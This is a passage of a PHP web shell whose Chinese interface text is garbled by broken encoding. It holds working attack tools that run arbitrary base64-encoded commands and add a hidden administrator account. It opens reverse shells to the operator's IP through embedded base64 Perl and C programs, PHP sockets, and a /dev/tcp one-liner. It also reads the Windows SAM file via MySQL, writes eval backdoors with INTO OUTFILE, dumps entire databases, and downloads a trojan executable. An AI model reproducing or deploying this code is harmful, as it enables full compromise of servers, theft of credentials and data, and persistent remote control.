(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";\r\n\r\n$info = array(\r\narray("�����ʱ��/����ʱ��",date("Y��m��d�� h:i:s",time())."&nbsp;/&nbsp;".gmdate("Y��n��j�� H:i:s",time()+8*3600)),\r\narray("��������:�˿�(ip)","<a href=\\"http://".$_SERVER[\'SERVER_NAME\']."\\" \r\ntarget=\\"_blank\\">".$_SERVER[\'SERVER_NAME\']."</a>:".$_SERVER[\'SERVER_PORT\']." ( ".gethostbyname($_SERVER[\'SERVER_NAME\'])." )"),\r\narray("��������ϵͳ(���ֱ�\r\n��)",PHP_OS." (".$_SERVER[\'HTTP_ACCEPT_LANGUAGE\'].")"),\r\narray("������������",$_SERVER[\'SERVER_SOFTWARE\']),\r\narray("���IP",getenv(\'REMOTE_ADDR\')),\r\narray("PHP���з�ʽ(\r\n�汾)",strtoupper(php_sapi_name())."(".PHP_VERSION.") / ��ȫģʽ:".Info_Cfg("safemode")),\r\narray("��������Ա",$adminmail),\r\narray("���ļ�·��",__FILE__),\r\narray("����ʹ��URL���ļ�[allow_url_fopen]",Info_Cfg("allow_url_fopen")),\r\narray("����̬������ӿ�[enable_dl]",Info_Cfg("enable_dl")),\r\narray("��ʾ������Ϣ[display_errors]",Info_Cfg("display_errors")),\r\narray("�Զ���ȫ�ֱ�[register_globals]",Info_Cfg("register_globals")),\r\narray("�Զ��ַ���ת��[magic_quotes_gpc]",Info_Cfg("magic_quotes_gpc")),\r\narray("����ڴ�ʹ���[memory_limit]",Info_Cfg("memory_limit")),\r\narray("POST����ֽ�[post_max_size]",Info_Cfg("post_max_size")),\r\narray("��������ϴ�[upload_max_filesize]",$upsize),\r\narray("���������ʱ��[max_execution_time]",Info_Cfg("max_execution_time")."��"),\r\narray("���ú��[disable_functions]",$dis_func),\r\narray("������Ϣ���[phpinfo()]",$phpinfo),\r\narray("Ŀǰ���п���ռ�diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).\'Mb\'),\r\narray("GZѹ��ļ�֧��[zlib]",Info_Fun("gzclose")),\r\narray("ZIPѹ��ļ�֧��[ZipArchive(php_zip)]",Info_Fun\r\n("zip_open")),\r\narray("IMAP�����ʼ�ϵͳ",Info_Fun("imap_close")),\r\narray("XML���",Info_Fun("xml_set_object")),\r\narray("FTP��½",Info_Fun("ftp_login")),\r\narray("Session֧��",Info_Fun\r\n("session_start")),\r\narray("Socket֧��",Info_Fun("fsockopen")),\r\narray("MySQL��ݿ�",Info_Fun("mysql_close")),\r\narray("MSSQL��ݿ�",Info_Fun("mssql_close")),\r\narray("Postgre SQL��ݿ�",Info_Fun("pg_close")),\r\narray("SQLite��ݿ�",Info_Fun("sqlite_close")),\r\narray("Oracle��ݿ�",Info_Fun("ora_close")),\r\narray("Oracle 8��ݿ�",Info_Fun("OCILogOff")),\r\narray("SyBase��ݿ�",Info_Fun("sybase_close")),\r\narray("Hyperwave��ݿ�",Info_Fun("hw_close")),\r\narray("InforMix��ݿ�",Info_Fun("ifx_close")),\r\narray("FilePro��ݿ�",Info_Fun("filepro_fieldcount")),\r\narray("DBA/DBM����",Info_Fun("dba_close")."&nbsp;/&nbsp;".Info_Fun("dbmclose")),\r\narray("ODBC/dBASE����",Info_Fun("odbc_close")."&nbsp;/&nbsp;".Info_Fun("dbase_close")),\r\narray("PREL�����﷨[PCRE]",Info_Fun("preg_match")),\r\narray("PDF֧��",Info_Fun("pdf_close")),\r\narray("ͼ�δ���[GD Library]",Info_Fun("imageline")),\r\narray("SNMP�����Э��",Info_Fun\r\n("snmpget")),);\r\n\r\necho \'<table width="100%" border="0">\';\r\nfor($i = 0;$i < count($info);$i++){echo \'<tr><td width="40%">\'.$info[$i][0].\'</td><td>\'.$info[$i][1].\'</td></tr>\'."\\n";}\r\n\r\n\r\n$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");\r\ntry{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\Tds\\\\tcp\\PortNumber");\r\n$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\TelnetServer\\\\1.0\\\\TelnetPort");\r\n$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Symantec\\\\pcAnywhere\\\\CurrentVersion\\\\System\\\\TCPIPDataPort");\r\n}catch(Exception $e){}\r\n    echo \'<tr><td width="40%">Terminal Service�˿�Ϊ</td><td>\'.$registry_proxystring.\'</td></tr>\'."\\n";\r\n\techo \'<tr><td width="40%">Telnet�˿�Ϊ</td><td>\'.$Telnet.\'</td></tr>\'."\\n";\r\n\techo \'<tr><td width="40%">PcAnywhere�˿�Ϊ</td><td>\'.$PcAnywhere.\'</td></tr>\'."\\n";\r\n\techo \'</table>\';\r\nbreak;\r\n\r\n    case "cmd":\r\n\t$res = \'���Դ���\';\r\n\t$cmd = \'dir\';\r\n\tif(!empty($_POST[\'cmd\'])){$res = Exec_Run(base64_decode($_POST[\'cmd\']));$cmd = htmlspecialchars(base64_decode($_POST[\'cmd\']));}\r\nprint<<<END\r\n<script language="javascript">\r\nfunction sFull(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "dir";\r\n\tStr[1] = "net user PHPINFO_CC PHPINFO_CC /add";\r\n\tStr[2] = "net localgroup administrators PHPINFO_CC /add";\r\n\tStr[3] = "netstat -ano";\r\n\tStr[4] = "ipconfig";\r\n\tStr[5] = "copy c:\\\\1.php d:\\\\2.php";\r\n\tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\\\server.exe";\r\n\tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";\r\n\tStr[8] = "tasklist -svc";\r\n\tdocument.getElementById(\'cmd\').value = Str[i];\r\n\treturn true;\r\n}\r\nEND;\r\nhtml_base();\r\nprint<<<END\r\nfunction SubmitUrl(){\r\n\t\t\tdocument.getElementById(\'cmd\').value = base64encode(document.getElementById(\'cmd\').value);\r\n\t\t\tdocument.getElementById(\'gform\').submit();\r\n}\r\n</script>\r\n<form method="POST" name="gform" id="gform" ><center><div class="actall">ִ���������ܶ���غ������ִ�в��ˣ����˷�������������û���κι�����ִ�������ʹ��BASE64�����ύ����ֹ������Сϸ�ڣ���ɾͣ�</div><div class="actall">\r\n����� <input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">\r\n<select onchange=\'return sFull(options[selectedIndex].value)\'>\r\n<option value="0" selected>--����--</option>\r\n<option value="1">��ӹ��Ա</option>\r\n<option value="2">��Ϊ�����</option>\r\n<option value="3">�鿴�˿�</option>\r\n<option value="4">�鿴��ַ</option>\r\n<option value="5">�����ļ�</option>\r\n<option value="6">FTP����</option>\r\n<option value="7">Linux����</option>\r\n<option value="8">�鿴����</option>\r\n</select>\r\n\t<input type="button" value="ִ��" onclick="SubmitUrl();" style="width:80px;">\r\n</div>\r\n<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>\r\n</form>\r\nEND;\r\n\tbreak;\r\n\r\n\r\n\r\ncase "linux":\r\n\t\r\n\t$yourip = isset($_POST[\'yourip\']) ? $_POST[\'yourip\'] : getenv(\'REMOTE_ADDR\');\r\n\t$yourport = isset($_POST[\'yourport\']) ? $_POST[\'yourport\'] : \'12666\';\r\n\t$system=strtoupper(substr(PHP_OS, 0, 3));\r\nprint<<<END\r\n<div class="actall">ʹ�÷�����<br>\r\n\t\t\t�����Լ���������"nc -vv -l 12666"<br>\r\n\t\t\tȻ���ڴ���д����Ե�IP,���ӣ��˷�����ȫ��ʵ�ã�����NC������</div>\r\n<form method="POST" name="kform" id="kform">\r\n<div class="actall">��ĵ�ַ <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>\r\n<div class="actall">���Ӷ˿� <input type="text" name="yourport" value="12666" style="width:400px"></div>\r\n<div class="actall">ִ�з�ʽ <select name="use" >\r\n<option value="perl">Perl</option>\r\n<option value="c">C</option>\r\n<option value="php">PHP</option>\r\n<option value="nc">NC</option>\r\n</select></div>\r\n<div class="actall"><input type="submit" value="��ʼ����" style="width:80px;"></div></form>\r\nEND;\r\n\tif((!empty($_POST[\'yourip\'])) && (!empty($_POST[\'yourport\'])))\r\n\t{\r\n\t\r\n\t\techo \'<div class="actall">\';\r\n\t\tif($_POST[\'use\'] == \'perl\')\r\n\t\t{\r\n\t\t\t$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".\r\n\t\t\t"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".\r\n\t\t\t"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".\r\n\t\t\t"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".\r\n\t\t\t"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".\r\n\t\t\t"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".\r\n\t\t\t"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";\r\n\t\t\techo File_Write(\'/tmp/envl_bc\',base64_decode($back_connect_pl),\'wb\') ? \'����/tmp/envl_bc�ɹ�<br>\' : \'����/tmp/envl_bcʧ��<br>\';\r\n\t\t\t$perlpath = Exec_Run(\'which perl\');\r\n\t\t\t$perlpath = $perlpath ? chop($perlpath) : \'perl\';\r\n\t\t\t@unlink(\'/tmp/envl_bc.c\');\r\n\t\t\techo Exec_Run($perlpath.\' /tmp/envl_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -vv -l \'.$_POST[\'yourport\'] : \'ִ�����ʧ��\';\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'c\')\r\n\t\t{\r\n\t\t\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".\r\n\t\t\t"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".\r\n\t\t\t"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".\r\n\t\t\t"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".\r\n\t\t\t"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".\r\n\t\t\t"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".\r\n\t\t\t"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".\r\n\t\t\t"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";\r\n\t\t\techo File_Write(\'/tmp/envl_bc.c\',base64_decode($back_connect_c),\'wb\') ? \'����/tmp/envl_bc.c�ɹ�<br>\' : \'����/tmp/envl_bc.cʧ��<br>\';\r\n\t\t\t$res = Exec_Run(\'gcc -o /tmp/envl_bc /tmp/envl_bc.c\');\r\n\t\t\t@unlink(\'/tmp/envl_bc.c\');\r\n\t\t\techo Exec_Run(\'/tmp/envl_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -vv -l \'.$_POST[\'yourport\'] : \'ִ�����ʧ��\';\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'php\')\r\n\t\t{\r\n\t\tif(!extension_loaded(\'sockets\'))\r\n           {\r\n\t        if ($system == \'WIN\') {\r\n\t\t        @dl(\'php_sockets.dll\') or die("Can\'t load socket");\r\n\t        }else{\r\n\t    \t    @dl(\'sockets.so\') or die("Can\'t load socket");\r\n\t        }\r\n           }\r\n\t\t   if($system=="WIN")\r\n           {\r\n         \t$env=array(\'path\' => \'c:\\\\windows\\\\system32\');\r\n            }else{\r\n\t        $env = array(\'PATH\' => \'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin\');\r\n           }\r\n           $descriptorspec = array(\r\n         \t0 => array("pipe","r"),\r\n\t        1 => array("pipe","w"),\r\n\t        2 => array("pipe","w"),\r\n           );\r\n\t\t   $host = $_POST[\'yourip\'];\r\n       \t   $port = $_POST[\'yourport\'];\r\n           $host=gethostbyname($host);\r\n           $proto=getprotobyname("tcp");\r\n           if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){\r\n             die("Socket����ʧ��");\r\n           }\r\n           if(($ret=socket_connect($sock,$host,$port))<0){\r\n             die("����ʧ��");\r\n           }else{\r\n             $message="----------------------PHP��������--------------------\\n";\r\n             socket_write($sock,$message,strlen($message));\r\n             $cwd=str_replace(\'\\\\\',\'/\',dirname(__FILE__));\r\n             while($cmd=socket_read($sock,65535,$proto)){\r\n                if(trim(strtolower($cmd))=="exit"){\r\n                   socket_write($sock,"Bye\\n");\r\n                   exit;\r\n                }else{\r\n                   $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);\r\n                   if (is_resource($process)) {\r\n\t                fwrite($pipes[0], $cmd);\r\n\t                fclose($pipes[0]);\r\n\t                $msg=stream_get_contents($pipes[1]);\r\n\t                socket_write($sock,$msg,strlen($msg));\r\n\t                fclose($pipes[1]);\r\n\t                $msg=stream_get_contents($pipes[2]);\r\n\t                socket_write($sock,$msg,strlen($msg));\r\n\t                $return_value = proc_close($process);\r\n                   }\r\n                }\r\n\t\t   }\r\n\t\t  }\r\n\t\t}\r\n\t\tif($_POST[\'use\'] == \'nc\')\r\n\t\t{\r\n\t     echo \'<div class="actall">\';\r\n\t\t $mip=$_POST[\'yourip\'];\r\n\t\t $bport=$_POST[\'yourport\'];\r\n\t\t $fp=fsockopen($mip , $bport , $errno, $errstr);\r\n\t\t if (!$fp){\r\n\t\t     $result = "Error: could not open socket connection";\r\n\t\t    }else {\r\n\t\t fputs ($fp ,"\\n*********************************************\\n \r\n\t\t              hacking url:http://www.caidaome.com is ok!        \r\n\t\t\t          \\n*********************************************\\n\\n");\r\n\t     while(!feof($fp)){ \r\n         fputs ($fp," [r00t@H4c3ing:/root]# ");\r\n         $result= fgets ($fp, 4096);\r\n         $message=`$result`;\r\n         fputs ($fp,"--> ".$message."\\n");\r\n                          }\r\n         fclose ($fp);\r\n\t\t       }\r\n         echo \'</div>\';\r\n\t\t}\r\n\r\n\t\techo \'<br>����Գ�����Ӷ˿� (nc -vv -l \'.$_POST[\'yourport\'].\') \';\r\n\t}\r\nbreak;\r\n\r\n\tcase "sqlshell":\r\n\t$MSG_BOX = \'\';\r\n\t$mhost = \'localhost\'; $muser = \'root\'; $mport = \'3306\'; $mpass = \'\'; $mdata = \'mysql\'; $msql = \'select version();\';\r\n\tif(isset($_POST[\'mhost\']) && isset($_POST[\'muser\']))\r\n\t{\r\n\t\t$mhost = $_POST[\'mhost\']; $muser = $_POST[\'muser\']; $mpass = $_POST[\'mpass\']; $mdata = $_POST[\'mdata\']; $mport = $_POST[\'mport\'];\r\n\t\tif($conn = mysql_connect($mhost.\':\'.$mport,$muser,$mpass)) @mysql_select_db($mdata);\r\n\t\telse $MSG_BOX = \'����MYSQLʧ��\';\r\n\t}\r\n\t$downfile = \'c:/windows/repair/sam\';\r\n\tif(!empty($_POST[\'downfile\']))\r\n\t{\r\n\t\t$downfile = File_Str($_POST[\'downfile\']);\r\n\t\t$binpath = bin2hex($downfile);\r\n\t\t$query = \'select load_file(0x\'.$binpath.\')\';\r\n\t\tif($result = @mysql_query($query,$conn))\r\n\t\t{\r\n\t\t\t$k = 0; $downcode = \'\';\r\n\t\t\twhile($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}\r\n\t\t\t$filedown = basename($downfile);\r\n\t\t\tif(!$filedown) $filedown = \'envl.tmp\';\r\n\t\t\t$array = explode(\'.\', $filedown);\r\n\t\t\t$arrayend = array_pop($array);\r\n\t\t\theader(\'Content-type: application/x-\'.$arrayend);\r\n\t\t\theader(\'Content-Disposition: attachment; filename=\'.$filedown);\r\n\t\t\theader(\'Content-Length: \'.strlen($downcode));\r\n\t\t\techo $downcode;\r\n\t\t\texit;\r\n\t\t}\r\n\t\telse $MSG_BOX = \'�����ļ�ʧ��\';\r\n\t}\r\n\t$o = isset($_GET[\'o\']) ? $_GET[\'o\'] : \'\';\r\nprint<<<END\r\n<form method="POST" name="nform" id="nform">\r\n<center><div class="actall"><a href="?eanver=sqlshell">[MYSQLִ�����]</a> \r\n<a href="?eanver=sqlshell&o=u">[MYSQL�ϴ��ļ�]</a> \r\n<a href="?eanver=sqlshell&o=d">[MYSQL�����ļ�]</a>\r\n<a href="?eanver=sqlshell&o=tk">[MYSQL�ѿ㱸��]</a> </div>\r\n<div class="actall">\r\n��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">\r\n�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">\r\n�û� <input type="text" name="muser" value="{$muser}" style="width:110px">\r\n���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">\r\n��� <input type="text" name="mdata" value="{$mdata}" style="width:110px">\r\n</div>\r\n<div class="actall" style="height:220px;">\r\nEND;\r\nif($o == \'u\')\r\n{\r\n\t$uppath = \'C:/Documents and Settings/All Users/����ʼ���˵�/����/��/exp.vbs\';\r\n\tif(!empty($_POST[\'uppath\']))\r\n\t{\r\n\t\t$uppath = $_POST[\'uppath\'];\r\n\t\t$query = \'Create TABLE a (cmd text NOT NULL);\';\r\n\t\tif(@mysql_query($query,$conn))\r\n\t\t{\r\n\t\t\tif($tmpcode = File_Read($_FILES[\'upfile\'][\'tmp_name\'])){$filecode = bin2hex(File_Read($tmpcode));}\r\n\t\t\telse{$tmp = File_Str(dirname(myaddress)).\'/upfile.tmp\';if(File_Up($_FILES[\'upfile\'][\'tmp_name\'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}\r\n\t\t\t$query = \'Insert INTO a (cmd) VALUES(CONVERT(0x\'.$filecode.\',CHAR));\';\r\n\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t{\r\n\t\t\t\t$query = \'SELECT cmd FROM a INTO DUMPFILE \\\'\'.$uppath.\'\\\';\';\r\n\t\t\t\t$MSG_BOX = @mysql_query($query,$conn) ? \'�ϴ��ļ��ɹ�\' : \'�ϴ��ļ�ʧ��\';\r\n\t\t\t}\r\n\t\t\telse $MSG_BOX = \'�����ʱ��ʧ��\';\r\n\t\t\t@mysql_query(\'Drop TABLE IF EXISTS a;\',$conn);\r\n\t\t}\r\n\t\telse $MSG_BOX = \'������ʱ��ʧ��\';\r\n\t}\r\nprint<<<END\r\n<br><br>�ϴ�·�� <input type="text" name="uppath" value="{$uppath}" style="width:500px">\r\n<br><br>ѡ���ļ� <input type="file" name="upfile" style="width:500px;height:22px;">\r\n</div><div class="actall"><input type="submit" value="�ϴ�" style="width:80px;">\r\nEND;\r\n}elseif($o==\'tk\'){\r\nif($_POST[\'dump\']==\'dump\'){\r\n$mysql_link=@mysql_connect($mhost,$muser,$mpass);\r\nmysql_select_db($mdata);\r\nmysql_query("SET NAMES gbk");\r\n$mysql="";\r\n$q1=mysql_query("show tables");\r\nwhile($t=mysql_fetch_array($q1)){\r\n$table=$t[0];\r\n$q2=mysql_query("show create table `$table`");\r\n$sql=mysql_fetch_array($q2);\r\n$mysql.=$sql[\'Create Table\'].";\\r\\n\\r\\n";\r\n$q3=mysql_query("select * from `$table`");\r\nwhile($data=mysql_fetch_assoc($q3))\r\n{\r\n$keys=array_keys($data);\r\n$keys=array_map(\'addslashes\',$keys);\r\n$keys=join(\'`,`\',$keys);\r\n$keys="`".$keys."`";\r\n$vals=array_values($data);\r\n$vals=array_map(\'addslashes\',$vals);\r\n$vals=join("\',\'",$vals);\r\n$vals="\'".$vals."\'";\r\n$mysql.="insert into `$table`($keys) values($vals);\\r\\n";\r\n}\r\n$mysql.="\\r\\n";\r\n}\r\n$filename=date("Y-m-d-GisA").".sql";\r\n$fp=fopen($filename,\'w\');\r\nfputs($fp,$mysql);\r\nfclose($fp);\r\n$tip="<br><center>��ݱ��ݳɹ�����������ݿ��ļ���[<a href=\\"".$filename."\\" title=\\"������\\">".$filename."</a>]</center>";\r\n}else{$tip="��δ���ݣ���֤���������Ŀ¼��д";}\r\nprint<<<END\r\n<div class="actall"><form method="post" action="?s=n&o=tk"><br>\r\n����ñ����ܣ���ݿ�����ɷ����崻����� :-(<br><br>\r\n{$tip}<br><br>\r\n<input type="hidden" value="dump" name="dump" id="dump">\r\n<input type="submit" value="һ������" tilte="Submit" style="width:120px;height:64px;">\r\n</form><div>\r\nEND;\r\n}\r\nelseif($o == \'d\')\r\n{\r\nprint<<<END\r\n<br><br><br>�����ļ� <input type="text" name="downfile" value="{$downfile}" style="width:500px">\r\n</div><div class="actall"><input type="submit" value="����" style="width:80px;">\r\nEND;\r\n}\r\nelse\r\n{\r\n\tif(!empty($_POST[\'msql\']))\r\n\t{\r\n\t\t$msql = $_POST[\'msql\'];\r\n\t\tif($result = @mysql_query($msql,$conn))\r\n\t\t{\r\n\t\t\t$MSG_BOX = \'ִ��SQL���ɹ�<br>\';\r\n\t\t\t$k = 0;\r\n\t\t\twhile($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}\r\n\t\t}\r\n\t\telse $MSG_BOX .= mysql_error();\r\n\t}\r\nprint<<<END\r\n<script language="javascript">\r\nfunction nFull(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "select version();";\r\n\tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile \'D:/web/iis.txt\'";\r\n\tStr[2] = "select \'<?php eval(\\$_POST[cmd]);?>\' into outfile \'F:/web/bak.php\';";\r\n\tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO \'root\'@\'%\' IDENTIFIED BY \'123456\' WITH GRANT OPTION;";\r\n\tStr[4] = "select @@plugin_dir";\r\n\tStr[5] = "select \'xxx\' into dumpfile \'C:\\\\\\\\\\\\\\\\MySQL\\\\\\\\\\\\\\\\lib::\\$INDEX_ALLOCATION\';";\r\n\tStr[6] = "select \'xxx\' into dumpfile \'C:\\\\\\\\\\\\\\\\MySQL\\\\\\\\\\\\\\\\lib\\\\\\\\\\\\\\\\plugin::\\$INDEX_ALLOCATION\';";\r\n\tnform.msql.value = Str[i];\r\n\treturn true;\r\n}\r\n</script>\r\n<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>\r\n<div class="actall">\r\n<select onchange="return nFull(options[selectedIndex].value)">\r\n\t<option value="0" selected>��ʾ�汾</option>\r\n\t<option value="1">�����ļ�</option>\r\n\t<option value="2">д���ļ�</option>\r\n\t<option value="3">������</option>\r\n\t<option value="4">��ѯMYSQL��Ŀ¼</option>\r\n\t<option value="5">NTFS-ADS������Ŀ¼1</option>\r\n\t<option value="5">NTFS-ADS������Ŀ¼2</option>\r\n</select>\r\n<input type="submit" value="ִ��" style="width:80px;">\r\nEND;\r\n}\r\n\tif($MSG_BOX != \'\') echo \'</div><div class="actall">\'.$MSG_BOX.\'</div></center></form>\';\r\n\telse echo \'</div></center></form>\';\r\n\tbreak;\r\n\t\r\n    case "downloader":\r\n\t$Com_durl = isset($_POST[\'durl\']) ? $_POST[\'durl\'] : \'http://www.baidu.com/down/muma.exe\';\r\n\t$Com_dpath= isset($_POST[\'dpath\']) ? $_POST[\'dpath\'] : File_Str(dirname(myaddress).\'/muma.exe\');\r\nprint<<<END\r\n\t<form method="POST">\r\n    <div class="actall">������ <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>\r\n    <div class="actall">���ص� <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>\r\n    <div class="actall"><input value="����" type="submit" style="width:80px;"></div></form>\r\nEND;\r\n\tif((!empty($_POST[\'durl\'])) && (!empty($_POST[\'dpath\'])))\r\n\t{\r\n\t\techo \'<div class="actall">\';\r\n\t\t$contents = @file_get_contents($_POST[\'durl\']);\r\n\t\tif(!$contents) echo \'�޷���ȡҪ���ص����\';\r\n\t\telse echo File_Write($_POST[\'dpath\'],$contents,\'wb\') ? \'�����ļ��ɹ�\' : \'�����ļ�ʧ��\';\r\n\t\techo \'</div>\';\r\n\t}\r\n\tbreak;\r\n\r\n\tcase "issql":\r\n\tsession_start();\r\n  if($_POST[\'sqluser\'] && $_POST[\'sqlpass\']){\r\n    $_SESSION[\'sql_user\'] = $_POST[\'sqluser\'];\r\n    $_SESSION[\'sql_password\'] = $_POST[\'sqlpass\'];\r\n  }\r\n  if($_POST[\'sqlhost\']){$_SESSION[\'sql_host\'] = $_POST[\'sqlhost\'];}\r\n  else{$_SESSION[\'sql_host\'] = \'localhost\';}\r\n  if($_POST[\'sqlport\']){$_SESSION[\'sql_port\'] = $_POST[\'sqlport\'];}\r\n  else{$_SESSION[\'sql_port\'] = \'3306\';}\r\n  if($_SESSION[\'sql_user\'] && $_SESSION[\'sql_password\']){\r\n    if(!($sqlcon = @mysql_connect($_SESSION[\'sql_host\'].\':\'.$_SESSION[\'sql_port\'],$_SESSION[\'sql_user\'],$_SESSION[\'sql_password\']))){\r\n      unset($_SESSION[\'sql_user\'], $_SESSION[\'sql_password\'], $_SESSION[\'sql_host\'], $_SESSION[\'sql_port\']);\r\n      die(html_a(\'?eanver=sqlshell\',\'����ʧ���뷵��\'));\r\n    }\r\n  }\r\n  else{\r\n    die(html_a(\'?eanver=sqlshell\',\'����ʧ���뷵��\'));\r\n  }\r\n  $query = mysql_query("SHOW DATABASES",$sqlcon);\r\n  html_n(\'<tr><td>��ݿ�б�:\');\r\n  while($db = mysql_fetch_array($query)) {\r\n\t\thtml_a(\'?eanver=issql&db=\'.$db[\'Database\'],$db[\'Database\']);\r\n\t\techo \'&nbsp;&nbsp;\';\r\n\t}\r\n  html_n(\'</td></tr>\');\r\n  if($_GET[\'db\']){\r\n  \tcss_js("3");\r\n    mysql_select_db($_GET[\'db\'], $sqlcon);\r\n    html_n(\'<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">\'.$_POST[\'sql\'].\'</textarea><br>\');\r\n    html_select(array(0=>"--SQL�﷨--",7=>"������",8=>"ɾ�����",9=>"�޸����",10=>"����ݱ�",11=>"ɾ��ݱ�",12=>"����ֶ�",13=>"ɾ���ֶ�"),0,"onchange=\'return Full(options[selectedIndex].value)\'");\r\n    html_input("submit","doquery","ִ��");\r\n    html_a("?eanver=issql&db=".$_GET[\'db\'],$_GET[\'db\']);\r\n    html_n(\'--->\');\r\n    html_a("?eanver=issql&db=".$_GET[\'db\']."&table=".$_GET[\'table\'],$_GET[\'table\']);\r\n    html_n(\'</form><br>\');\r\n  \tif(!empty($_POST[\'sql\'])){\r\n\t\t\tif (@mysql_query($_POST[\'sql\'],$sqlcon)) {\r\n\t\t\t\techo "ִ��SQL���ɹ�";\r\n\t\t\t}else{\r\n\t\t\t\techo "����: ".mysql_error();\r\n\t\t\t}\r\n  \t}\r\n    if($_GET[\'table\']){\r\n      html_n(\'<table border=1><tr>\');\r\n      $query = "SHOW COLUMNS FROM ".$_GET[\'table\'];\r\n      $result = mysql_query($query,$sqlcon);\r\n      $fields = array();\r\n      while($row = mysql_fetch_assoc($result)){\r\n        array_push($fields,$row[\'Field\']);\r\n        html_n(\'<td><font color=#FFFF44>\'.$row[\'Field\'].\'</font></td>\');\r\n      }\r\n      html_n(\'</tr><tr>\');\r\n      $result = mysql_query("SELECT * FROM ".$_GET[\'table\'],$sqlcon) or die(mysql_error());\r\n      while($text = @mysql_fetch_assoc($result)){\r\n      \tforeach($fields as $row){\r\n      \t\tif($text[$row] == "") $text[$row] = \'NULL\';\r\n      \t\thtml_n(\'<td>\'.$text[$row].\'</td>\');\r\n      \t}\r\n      \techo \'</tr>\';\r\n      }\r\n    